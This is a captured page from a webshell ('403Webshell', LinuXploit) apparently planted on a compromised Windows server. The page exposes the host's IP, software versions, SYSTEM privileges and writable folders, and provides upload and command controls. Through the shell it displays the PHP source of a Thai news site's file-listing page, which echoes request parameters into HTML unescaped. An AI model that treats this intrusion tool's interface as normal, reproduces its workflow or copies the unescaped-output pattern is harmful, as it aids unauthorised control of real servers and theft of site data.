403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/news/cooprat/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/news/cooprat/filems-old.php
<?php 
session_start();
include("header.php");
$id = $mysqli->escape_string($_GET['id']);
$uid = $mysqli->escape_string($_GET['uid']);
 ?>
 <html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>อัลบั้ม</title>
           <script src="bootstrap/js/jquery-3.2.1.min.js"></script>  
           <link rel="stylesheet" href="bootstrap/css/bootstrap.min.css" />  
           <script src="bootstrap/js/jquery.dataTables.min.js"></script>  
           <script src="bootstrap/js/dataTables.bootstrap.min.js"></script>            
           <link rel="stylesheet" href="bootstrap/css/dataTables.bootstrap.min.css" /> 
		   <script src="bootstrap/js/bootstrap.min.js"></script>
<style type="text/css">
<!--
#Layer1 {
	position:absolute;
	left:25px;
	top:10px;
	width:100px;
	height:99px;
	z-index:1;
}
-->
</style>
<?php
// Create the function, so you can use it
function isMobile() {
    return preg_match("/(android|avantgo|blackberry|bolt|boost|cricket|docomo|fone|hiptop|mini|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i", $_SERVER["HTTP_USER_AGENT"]);
}
// If the user is on a mobile device, redirect them
if(isMobile()) {} else {
echo "<div id='Layer1'><a href='index.php'><img src='images/logo.png'></a></div>";
}
?>

<script language="JavaScript">
function checkall(source) {
  checkboxes = document.getElementsByName('chk[]');
  for(var i=0, n=checkboxes.length;i<n;i++) {
    checkboxes[i].checked = source.checked;
  }
}
</script>
<script type="text/javascript" language="javascript" >
			$(document).ready(function() {
							
				var dataTable = $('#datatable1').DataTable( {
					"processing": true,
					"serverSide": false,
					"pageLength": 25,
					"pagingType": "full_numbers",    
					"ordering": false,
					"order": [[0, "ASC"]],
					"columnDefs": [ {
						  "targets": 0,
						  "orderable": false,
						  "searchable": false
						   
						} ]

				} );
			} );	
</script>	
<style>
.fileUpload {
    position: relative;
    overflow: hidden;
    margin: 0px;
	left: 10px;
}
.fileUpload input.upload {
    position: absolute;
    top: 0;
    right: 0;
    margin: 0;
    padding: 0;
    font-size: 20px;
    cursor: pointer;
    opacity: 0;
    filter: alpha(opacity=0);
}
</style>

<script language="JavaScript">
function checkall(source) {
  checkboxes = document.getElementsByName('chk[]');
  for(var i=0, n=checkboxes.length;i<n;i++) {
    checkboxes[i].checked = source.checked;
  }
}
</script>		   
 
</head>

<body>
<?php if(!isset($_SESSION['username'])){?>

<?php
			echo "<script language=javascript>alert('คุณยังไม่ได้เข้าระบบ');</script>";
			echo "<script>window.parent.location=\"index.php\"</script>";

?>

<?php }else{ ?>
		<div class="col-sm-12">
		<div class="row">
		<?php 
$SQL1 = $mysqli->query("SELECT * FROM posts WHERE id ='$id'");
$Row1 = mysqli_fetch_array($SQL1);

?><center><h2>ไฟล์เอกสารประกอบ</h2><p><?=$Row1['title'] ?></p></center>
		</div>
		<div class="row">&nbsp; &nbsp;
<input type="checkbox" onClick="checkall(this)" /> <button type="button" data-toggle="modal" data-target="#myModal1" class="btn btn-danger btn-sm"><span class="glyphicon glyphicon-trash"></span></button>
<button type="button" data-toggle="modal" data-target="#ADD-file" class="btn btn-success btn-sm"><span class="glyphicon glyphicon-plus"></span> เพิ่มไฟล์เอกสาร</button>

<!-- Modal -->
<div id="ADD-file" class="modal fade" role="dialog">
  <div class="modal-dialog">

    <!-- Modal content-->
    <div class="modal-content">
      <div class="modal-header">
        <button type="button" class="close" data-dismiss="modal">&times;</button>
        <h4 class="modal-title">เพิ่มไฟล์เอกสาร</h4>
      </div>
      <div class="modal-body">
        <p>
<form id="form1" name="form1" method="post" action="filems_story_save.php?idn=<?=$id;?>&uid=<?=$uid;?>" enctype="multipart/form-data" onsubmit="return checkma()">		
<div class="row">
<div class="col-md-2">
ชื่อไฟล์
</div>
<div class="col-md-10">
<input class="form-control input-sm" name="title" type="text" style=\'width:460px;\'  required>
</div>
</div>	

		<div class="row">
		<div class="col-md-12">
<div class="row"><br></div> 
<style>
.fileUpload {
    position: relative;
    overflow: hidden;
    margin: 0px;
	left: 10px;
}
.fileUpload input.upload {
    position: absolute;
    top: 0;
    right: 0;
    margin: 0;
    padding: 0;
    font-size: 20px;
    cursor: pointer;
    opacity: 0;
    filter: alpha(opacity=0);
}
</style>

<div class="row">
<div class="col-md-2">
ไฟล์  
</div>
					<div class="col-sm-10">
								<table width="400" border="0" align="left">
									<tr>
										<td align="left" valign="middle"><input id="uploadFile" style="width:370px;" placeholder="ไฟล์  .xlsx,.xls,.doc,.docx,.ppt,.pptx,.pdf,.rar,.zip" disabled="disabled" class="form-control" name="fileUpload" ></td>
										<td width="100" align="left" valign="middle">
										<div class="fileUpload btn btn-primary">
										<span>เลือกไฟล์</span>
										<input id="uploadBtn" type="file" class="upload"  accept=".xlsx,.xls,.doc,.docx,.ppt,.pptx,.pdf,.rar,.zip" name="fileUpload" >
										</div>
										</td>
									</tr>
								</table>

								
									<script type="text/javascript">  
										document.getElementById("uploadBtn").onchange = function () {  
										document.getElementById("uploadFile").value = this.value;
										};
									</script>
								
					</div> 
</div>


		</div>
		</div>
   </div>
               <div class="modal-footer">
                <button type="button" class="btn btn-default pull-left" data-dismiss="modal">ยกเลิก</button>
                <button type="submit" class="btn btn-success">บันทึก</button>
              </div> 
</form>		
		</p>
      </div>
    </div>

  </div>
</div>
<!-- End Modal -->
	<div class="row"><br></div>
		</div>
	<form action="delete_filems.php?uid=<?=$uid;?>&idn=<?=$id;?>" class="form-horizontal" method="post" name="Form1" enctype="multipart/form-data">
<div class="modal fade" id="myModal1">
          <div class="modal-dialog">
            <div class="modal-content">
              <div class="modal-header">
                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                  <span aria-hidden="true">&times;</span></button>
                <h4 class="modal-title">ลบข้อมูล</h4>
              </div>
	  
              <div class="modal-body">
			  <div class="row clearfix">
				<div class="col-md-2">
				<center><img src="images/what.jpg" width="70"></center>
				</div>
				<div class="col-md-10"><br>
					<p align="left">ไฟล์ที่เลือกจะถูกลบออกจากฐานข้อมูลไม่สามารถนำกลับมาใช้ได้ใหม่</p>
				</div>
              </div>
			  </div>
              <div class="modal-footer">
                <button type="button" class="btn btn-default pull-left" data-dismiss="modal">ยกเลิก</button>
                <button type="submit" class="btn btn-danger">ลบข้อมูล</button>
              </div>
	  
            </div>
          </div>
</div>		
 <table id="datatable1" class="table table-hover table-datatable table-striped table-bordered">
    <thead>
      <tr>
        <th><center>ที่</center></th>
        <th><center>ชื่อไฟล์</center></th>
        <th>ขนาดไฟล์</th>
      </tr>
    </thead>
    <tbody>
<?php

$sql= $mysqli->query("SELECT * FROM file  WHERE id_news='$id' ");
$i = 0;
while($row=mysqli_fetch_array($sql)) {
$i++;
$file_name=$row['file_name'];
$filetotal =  filesize("myfile/$file_name") ;
?>	
      <tr>
        <td width="80" align="center"> <input type="checkbox"  name="chk[]" value="<?=$row['id'] ?>"> #<?php echo "$i"; ?></td>
        <td><a href="myfile/<?=$file_name; ?>" target="_blank"><?=$row['detail'] ?></a></td>
        <td width="100" align="center"><?=round($filetotal/1024);?> KB</td>
      </tr>
<?php } ?>
    </tbody>
  </table>	
  </form>
		</div>
<?php }?>
</body>

<?php include("footer.php"); ?>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit